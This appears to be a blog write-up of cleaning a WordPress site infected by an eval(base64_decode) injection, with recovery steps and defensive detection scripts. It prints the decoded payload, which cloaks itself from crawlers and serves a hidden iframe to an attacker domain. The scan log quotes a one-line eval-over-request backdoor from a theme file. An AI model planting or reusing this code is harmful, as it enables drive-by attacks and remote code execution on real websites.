WordPress eval base64_decode Hack

shop1024

09 Jul WordPress eval base64_decode Hack

Troubleshoot eval(base64_decode


This post describes the impact of eval(base64_decode on Zo Nicholas’ WordPress-based author blog.

1. The Symptoms

The first symptom noticed was a change in the site's layout: the site was no longer centered in the browser but hanging on the left edge of the screen.

Checking the site from the server side, we notice that all index.php files show a modified first line starting like so:


eval(base64_decode('ZXJyb3JfcmVw......

followed by a long, long string of base64-encoded code.


We also find unusual PHP files which have been added on the server side.

Surprisingly, none of the added content changed the files' last-modified dates.

2. The analysis

2.1 First we decoded the above hack:


error_reporting(0);   // hide any PHP errors the payload might cause
$bot = FALSE ;
// Visitors whose User-Agent contains one of these substrings (crawlers, validators,
// feed readers) are treated as bots and are never served the iframe.
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
// IP ranges (mostly search-engine crawler networks) that are likewise exempted.
$stop_ips_masks = array(
 array("216.239.32.0","216.239.63.255"),
 array("64.68.80.0" ,"64.68.87.255" ),
 array("66.102.0.0", "66.102.15.255"),
 array("64.233.160.0","64.233.191.255"),
 array("66.249.64.0", "66.249.95.255"),
 array("72.14.192.0", "72.14.255.255"),
 array("209.85.128.0","209.85.255.255"),
 array("198.108.100.192","198.108.100.207"),
 array("173.194.0.0","173.194.255.255"),
 array("216.33.229.144","216.33.229.151"),
 array("216.33.229.160","216.33.229.167"),
 array("209.185.108.128","209.185.108.255"),
 array("216.109.75.80","216.109.75.95"),
 array("64.68.88.0","64.68.95.255"),
 array("64.68.64.64","64.68.64.127"),
 array("64.41.221.192","64.41.221.207"),
 array("74.125.0.0","74.125.255.255"),
 array("65.52.0.0","65.55.255.255"),
 array("74.6.0.0","74.6.255.255"),
 array("67.195.0.0","67.195.255.255"),
 array("72.30.0.0","72.30.255.255"),
 array("38.0.0.0","38.255.255.255")
 );
// Compare the visitor's address against each range as an unsigned integer.
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
 $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
 if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
 if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
// Only ordinary visitors receive the hidden 1x1 iframe pointing at the attacker's domain,
// which keeps the injection out of search-engine results and blacklists.
if (!$bot) {
echo '<iframe src="http://escpllns.co.tv/?go=1" width="1" height="1"></iframe>';
}

Decoding can easily be done at TOASTEDspam.
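The decoded payload above hides itself from crawlers and only shows up for ordinary visitors, so looking at the file is more reliable than looking at the site. The script below is an added example written for this post (not the author's procedure, nor TOASTEDspam's decoder): it decodes the base64 argument offline and walks a site tree for the two shapes the scan surfaced, the eval(base64_decode('...')) first line and the eval over $_REQUEST input found in the theme's functions.php. It is deliberately narrower than the Exploit Scan plug-in's heuristics, so WordPress core's own base64_decode calls do not match; the sample tree, payload and URL built in demo() are constructed stand-ins.

```python
import base64
import binascii
import os
import re
import tempfile

# Injected first line seen on the hacked site: eval(base64_decode('...'))
INJECT_RE = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)""")
# Backdoor shape the scanner found in themes/zo/functions.php: eval over request input
BACKDOOR_RE = re.compile(r"eval\s*\(\s*(?:stripslashes\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")

def decode_payload(b64):
    """Decode the base64 argument to text for inspection; nothing is executed."""
    try:
        raw = base64.b64decode("".join(b64.split()))
    except (binascii.Error, ValueError):
        return "<undecodable base64>"
    return raw.decode("utf-8", errors="replace")

def inspect_php_file(path):
    """Return a list of findings (dicts) for one PHP file."""
    findings = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    for m in INJECT_RE.finditer(text):
        payload = decode_payload(m.group(1))
        findings.append({
            "file": path,
            "kind": "eval_base64",
            "payload_head": payload[:40],      # e.g. "error_reporting(0); ..."
            "urls": URL_RE.findall(payload),   # the hidden iframe target, if any
        })
    if BACKDOOR_RE.search(text):
        findings.append({"file": path, "kind": "request_eval_backdoor"})
    return findings

def scan_tree(root):
    """Walk a site tree and inspect every .php file, whatever its mtime says."""
    results = []
    for dirpath, _, names in os.walk(root):
        for n in sorted(names):
            if n.endswith(".php"):
                results.extend(inspect_php_file(os.path.join(dirpath, n)))
    return results

def demo():
    """Constructed sample site (not the real infected files) run through the scanner."""
    root = tempfile.mkdtemp()
    # Constructed payload in the shape of the decoded one above; the URL is a placeholder.
    payload = ("error_reporting(0);\n$bot = FALSE;\n"
               "if (!$bot) { echo '<iframe src=\"http://example.invalid/?go=1\" "
               "width=\"1\" height=\"1\"></iframe>'; }")
    b64 = base64.b64encode(payload.encode()).decode()
    theme = os.path.join(root, "wp-content", "themes", "zo")
    os.makedirs(theme)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php eval(base64_decode('" + b64 + "'));\n"
                 "/** Front to the WordPress application. */\n")
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write("<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));\n")
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write("<?php wp_head(); ?>\n")   # clean file: must produce no finding
    return scan_tree(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a copy of the web root taken before cleanup; the URLs it extracts are the indicators to block and to search the database for.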

2.2 We ran an exploit scan on the site

To scan the site we used the Exploit Scan Plug-in and got:

79 severe level matches:

webdesign/wp-includes/class-snoopy.php:678
Often used to execute malicious code    // I didn't use preg eval (//e) since that is only available in PHP 4.0.
webdesign/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.js:1
Often used to execute malicious code    cuteOnLoad:function(s){this.onInit.add(function(){eval(s)})},storeSelection:function(){this.editor.win
webdesign/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.dev.js:152
Often used to execute malicious code    eval(s);
webdesign/wp-includes/js/tinymce/tiny_mce_popup.js:5
Often used to execute malicious code    cuteOnLoad:function(s){this.onInit.add(function(){eval(s)})},storeSelection:function(){this.editor.win
webdesign/wp-includes/js/tinymce/tiny_mce.js:1
Often used to execute malicious code    eturn""+e},parse:function(s){try{return eval("("+s+")")}catch(ex){}}});t
webdesign/wp-includes/js/json2.js:1
Often used to execute malicious code    .replace(/(?:^|:|,)(?:\s*\[)+/g,""))){j=eval("("+text+")");return typeof
webdesign/wp-includes/js/json2.dev.js:466
Often used to execute malicious code    j = eval('(' + text + ')');
webdesign/wp-includes/js/tw-sack.dev.js:119
Often used to execute malicious code    eval(this.response);
webdesign/wp-includes/js/scriptaculous/unittest.js:476
Often used to execute malicious code    eval('with(this){'+test+'}');
webdesign/wp-includes/js/scriptaculous/controls.js:786
Often used to execute malicious code    this._collection = eval(js);
webdesign/wp-includes/js/jquery/jquery.schedule.js:30
Often used to execute malicious code    ctx["func"]=eval("function () { "+ctx["func"
webdesign/wp-includes/js/jquery/jquery.form.dev.js:333
Often used to execute malicious code    eval("data = " + data);
webdesign/wp-includes/js/jquery/jquery.form.dev.js:335
Often used to execute malicious code    $.globalEval(data);
webdesign/wp-includes/js/jquery/jquery.js:20
Often used to execute malicious code    async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||""
webdesign/wp-includes/js/jquery/jquery.js:144
Often used to execute malicious code    p;e.indexOf("javascript")>=0)c.globalEval(a);return a}});
webdesign/wp-includes/js/jquery/jquery.form.js:1
Often used to execute malicious code    .responseText;if(opts.dataType=="json"){eval("data = "+data)}else{$.globalEval(data)}}else{if(opts.dataType=="xml"){
webdesign/wp-includes/js/tw-sack.js:1
Often used to execute malicious code    .argumentSeparator)}};this.runResponse=function(){eval(this.response)};this.runAJAX=function(urlstring
webdesign/wp-includes/js/prototype.js:495
Often used to execute malicious code    is.extractScripts().map(function(script) { return eval(script) });
webdesign/wp-includes/js/prototype.js:599
Often used to execute malicious code    if (!sanitize || json.isJSON()) return eval('(' + json + ')');
webdesign/wp-includes/js/prototype.js:1533
Often used to execute malicious code    return eval((this.transport.responseText || '').u
webdesign/wp-includes/js/prototype.js:3257
Often used to execute malicious code    eval(this.matcher.join('\n'));
webdesign/wp-includes/js/swfupload/swfupload-all.js:2
Often used to execute malicious code    Array,0)+"</invoke>");returnValue=eval(returnString)}catch(ex){throw"Call to &quo
webdesign/wp-includes/js/swfupload/swfupload.js:450
Often used to execute malicious code    returnValue = eval(returnString);
webdesign/wp-includes/class-json.php:22
Often used to execute malicious code    * Javascript, and can be directly eval()'ed with no further parsing
webdesign/wp-includes/class-simplepie.php:14832
Used by malicious scripts to decode previously obscured data/programs    $data = base64_decode($data);
webdesign/wp-includes/class-IXR.php:303
Used by malicious scripts to decode previously obscured data/programs    $value = base64_decode($this->_currentTagContents);
webdesign/wp-includes/functions.php:190
Often used to execute malicious code    if ( doubleval($bytes) >= $mag )
webdesign/wp-admin/js/revisions-js.php:31
Often used to execute malicious code    eval(function(p,a,c,k,e,r){e=function(c){return(c<
webdesign/wp-admin/press-this.php:236
Often used to execute malicious code    var my_src = eval(
webdesign/wp-admin/press-this.php:247
Often used to execute malicious code    var my_src = eval(
webdesign/wp-admin/press-this.php:430
Often used to execute malicious code    eval(data);
webdesign/wp-admin/includes/class-pclzip.php:4063
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
webdesign/wp-app.php:1457
Used by malicious scripts to decode previously obscured data/programs    explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION']
webdesign/wp-app.php:1462
Used by malicious scripts to decode previously obscured data/programs    explode(':', base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'
webdesign/index.php:1
Often used to execute malicious code    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0
webdesign/index.php:1
Used by malicious scripts to decode previously obscured data/programs    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBT
index.php_ORG:1
Often used to execute malicious code    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0
index.php_ORG:1
Used by malicious scripts to decode previously obscured data/programs    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBT
logodesign/swfaddress/swfaddress.js:1
Often used to execute malicious code    (minified JavaScript snippet omitted)
wp-content/plugins/backwpup/app/php5-functions.php:385
Used by malicious scripts to decode previously obscured data/programs    ay($jobvalue['sugaruser'].'|'.base64_decode($jobvalue['sugarpass']).'|'
wp-content/plugins/backwpup/app/php5-functions.php:388
Used by malicious scripts to decode previously obscured data/programs    = new SugarSync($jobvalue['sugaruser'],base64_decode($jobvalue['sugarpass']),BACKWPUP_SUGA
wp-content/plugins/backwpup/app/php5-functions.php:405
Used by malicious scripts to decode previously obscured data/programs    []=$jobvalue['sugaruser'].'|'.base64_decode($jobvalue['sugarpass']).'|'
wp-content/plugins/backwpup/app/php5-functions.php:503
Used by malicious scripts to decode previously obscured data/programs    gin($ftp_conn_id, $jobvalue['ftpuser'], base64_decode($jobvalue['ftppass']))) {
wp-content/plugins/backwpup/app/php5-functions.php:507
Used by malicious scripts to decode previously obscured data/programs    $return=ftp_raw($ftp_conn_id,'PASS '.base64_decode($jobvalue['ftppass']));
wp-content/plugins/backwpup/app/php5-functions.php:522
Used by malicious scripts to decode previously obscured data/programs    ['ftpuser']).":".rawurlencode(base64_decode($jobvalue['ftppass']))."@".
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:2622
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:2776
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:3699
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:3946
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:4067
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:4135
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:4182
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/pclzip.lib.php:4253
Often used to execute malicious code    // eval('$v_result = '.$p_options[PCLZIP_CB_P
wp-content/plugins/backwpup/app/libs/Microsoft/WindowsAzure/SessionHandler.php:147
Used by malicious scripts to decode previously obscured data/programs    return base64_decode($sessionRecord->serializedData);
wp-content/plugins/backwpup/app/libs/Microsoft/WindowsAzure/Storage/Queue.php:464
Used by malicious scripts to decode previously obscured data/programs    base64_decode((string)$xmlMessages[$i]->MessageText)
wp-content/plugins/backwpup/app/libs/Microsoft/WindowsAzure/Credentials/CredentialsAbstract.php:108
Used by malicious scripts to decode previously obscured data/programs    $this->_accountKey = base64_decode($accountKey);
wp-content/plugins/backwpup/app/libs/Microsoft/WindowsAzure/Credentials/CredentialsAbstract.php:132
Used by malicious scripts to decode previously obscured data/programs    $this->_accountKey = base64_decode($value);
wp-content/plugins/backwpup/app/libs/dropbox/oauth.php:216
Used by malicious scripts to decode previously obscured data/programs    $decoded_sig = base64_decode($signature);
wp-content/plugins/backwpup/app/libs/aws/services/ec2.class.php:491
Used by malicious scripts to decode previously obscured data/programs    if (openssl_private_decrypt(base64_decode($data), $decrypted, $private_key))
wp-content/plugins/backwpup/app/libs/aws/services/ec2.class.php:1820
Used by malicious scripts to decode previously obscured data/programs    $response->body->output = base64_decode($response->body->output);
wp-content/plugins/backwpup/app/options-save.php:210
Used by malicious scripts to decode previously obscured data/programs    = new SugarSync($jobvalue['sugaruser'],base64_decode($jobvalue['sugarpass']),BACKWPUP_SUGA
wp-content/plugins/backwpup/app/options-save.php:246
Used by malicious scripts to decode previously obscured data/programs    gin($ftp_conn_id, $jobvalue['ftpuser'], base64_decode($jobvalue['ftppass']))) {
wp-content/plugins/backwpup/app/options-save.php:250
Used by malicious scripts to decode previously obscured data/programs    $return=ftp_raw($ftp_conn_id,'PASS '.base64_decode($jobvalue['ftppass']));
wp-content/plugins/backwpup/app/options-save.php:342
Used by malicious scripts to decode previously obscured data/programs    ew SugarSync($jobs[$jobid]['sugaruser'],base64_decode($jobs[$jobid]['sugarpass']),BACKWPUP_
wp-content/plugins/backwpup/app/backwpup_dojob.php:909
Used by malicious scripts to decode previously obscured data/programs    $ftp_conn_id, $this->job['ftpuser'], base64_decode($this->job['ftppass']))) {
wp-content/plugins/backwpup/app/backwpup_dojob.php:916
Used by malicious scripts to decode previously obscured data/programs    $return=ftp_raw($ftp_conn_id,'PASS '.base64_decode($this->job['ftppass']));
wp-content/plugins/backwpup/app/backwpup_dojob.php:965
Used by malicious scripts to decode previously obscured data/programs    .$this->job['ftpuser'].":".base64_decode($this->job['ftppass'])."@&quo
wp-content/plugins/backwpup/app/backwpup_dojob.php:1010
Used by malicious scripts to decode previously obscured data/programs    $phpmailer->Password=base64_decode($this->cfg['mailpass']);
wp-content/plugins/backwpup/app/backwpup_dojob.php:1337
Used by malicious scripts to decode previously obscured data/programs    ew SugarSync($this->job['sugaruser'],base64_decode($this->job['sugarpass']),BACKWPUP_
wp-content/plugins/backwpup/app/backwpup_dojob.php:1514
Used by malicious scripts to decode previously obscured data/programs    $phpmailer->Password=base64_decode($this->cfg['mailpass']);
wp-content/plugins/backwpup/app/options-settings.php:51
Used by malicious scripts to decode previously obscured data/programs    pe="password" value="<?PHP echo base64_decode($cfg['mailpass']);?>" class=&
wp-content/plugins/backwpup/app/options-edit-job.php:354
Used by malicious scripts to decode previously obscured data/programs    pe="password" value="<?PHP echo base64_decode($jobvalue['ftppass']);?>" cla
wp-content/plugins/backwpup/app/options-edit-job.php:449
Used by malicious scripts to decode previously obscured data/programs    pe="password" value="<?PHP echo base64_decode($jobvalue['sugarpass']);?>" c
wp-content/plugins/backwpup/app/options-edit-job.php:452
Used by malicious scripts to decode previously obscured data/programs    ['sugaruser'],'sugarpass'=>base64_decode($jobvalue['sugarpass']),'sugarro
wp-content/themes/zo/functions.php:1
Often used to execute malicious code    <?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));
store/wp-includes/class-snoopy.php:678
Often used to execute malicious code    // I didn't use preg eval (//e) since that is only available in PHP 4.0.
itconsulting/wp-app.php:1457
Used by malicious scripts to decode previously obscured data/programs    explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION']
itconsulting/wp-app.php:1462
Used by malicious scripts to decode previously obscured data/programs    explode(':', base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'
Post: Welcome!
Malicious scripts loaded in posts by hackers perform redirects, inject spam, etc.    p>Zo<br />  </p> <p><script type="text/javascript"> var gaJsH

A further 39 warnings were detected.

In addition, the scan produced 520 noteworthy matches.

3. Troubleshooting eval(base64_decode

While the exploit scan indicates where the hack may have had an impact, the result may not be complete.

As you can see from the above, manual troubleshooting can easily mess up your weekend!

In order to get through this in the most efficient way, this is how I will proceed:

1. Delete WordPress manually

I will manually delete all WordPress files in the root, as well as the folders wp-admin and wp-includes and the plugins. By deleting and then reloading WordPress we make sure that no added files remain on the server.

I will replace the deleted files and folders manually from a downloaded copy of WordPress 3.2 (the latest version).

2. Clean out wp-content

As this folder stores your themes and uploaded media, I go through its folders and files manually, deleting any file that appears suspect.

3. Load a Database back-up

As we back up our sites on all servers daily, weekly and monthly, we will simply load the latest clean MySQL databases.

4. Alternative

If you have a full account or server back-up available, just load the latest clean back-up.
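Step 1 relies on deleting and re-uploading to be sure nothing foreign is left. The script below is an added example (mine, not the post author's procedure) that checks the same thing before or after the reload without deleting anything: it hashes the live copy against a fresh WordPress download, so added and modified core files show up even though, as noted above, their last-modified dates were untouched, and it lists PHP under wp-content/uploads, where only media belongs. The trees, paths and file contents built in demo() are constructed stand-ins.

```python
import hashlib
import os
import tempfile

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def file_map(root):
    """Relative path -> sha256 for every regular file below root."""
    out = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            full = os.path.join(dirpath, n)
            out[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_of(full)
    return out

def compare_to_clean(live_root, clean_root):
    """Classify the live tree against a clean download by content, never by mtime
    (the attacker left last-modified dates untouched). wp-content is site-specific,
    so it is not reported as 'added'; instead PHP under wp-content/uploads is listed."""
    live, clean = file_map(live_root), file_map(clean_root)
    return {
        "added": sorted(p for p in live if p not in clean and not p.startswith("wp-content/")),
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "missing": sorted(p for p in clean if p not in live),
        "uploads_php": sorted(p for p in live
                              if p.startswith("wp-content/uploads/") and p.endswith(".php")),
    }

def _put(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)
    return full

def demo():
    """Constructed clean and live trees standing in for a fresh WordPress download
    and the hacked site; file contents are placeholders, not real WordPress code."""
    clean, live = tempfile.mkdtemp(), tempfile.mkdtemp()
    for root in (clean, live):
        _put(root, "wp-includes/class-snoopy.php", "<?php // unchanged core file\n")
        _put(root, "wp-admin/press-this.php", "<?php // unchanged core file\n")
    ref = _put(clean, "index.php", "<?php require('./wp-blog-header.php');\n")
    # Injected first line in the shape seen on the hacked site (payload is a placeholder).
    bad = _put(live, "index.php",
               "<?php eval(base64_decode('PLACEHOLDER'));\nrequire('./wp-blog-header.php');\n")
    _put(live, "wp-includes/img.php", "<?php // unknown file dropped by the attacker\n")
    _put(live, "wp-content/uploads/2011/07/cache.php", "<?php // PHP where only media belongs\n")
    # Reproduce the observation that the injected file kept its last-modified date.
    st = os.stat(ref)
    os.utime(bad, (st.st_atime, st.st_mtime))
    return compare_to_clean(live, clean)

if __name__ == "__main__":
    for key, paths in demo().items():
        print(key, paths)
```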

Conclusion

Whenever our sites are down, we lose money! Site maintenance and back-ups are essential for minimizing the risk. During the last 3 months I have spent many hours on the eval(base64_decode hack, and I guess it’s one of the more problematic hacks you can experience on your WordPress or other installation. In any case, the recovery may be time consuming and therefore costly.

2 Comments
  • Syclone0044
    Posted at 07:56h, 02 May

    Fabulous writeup!! Thanks so much. This base64_decode hack is a PITA to clean out. Your post laid it out for me.

  • Z Nicholas
    Posted at 03:32h, 11 July

    Thank you for all your help, hoping we have got rid of this nasty once and for all.
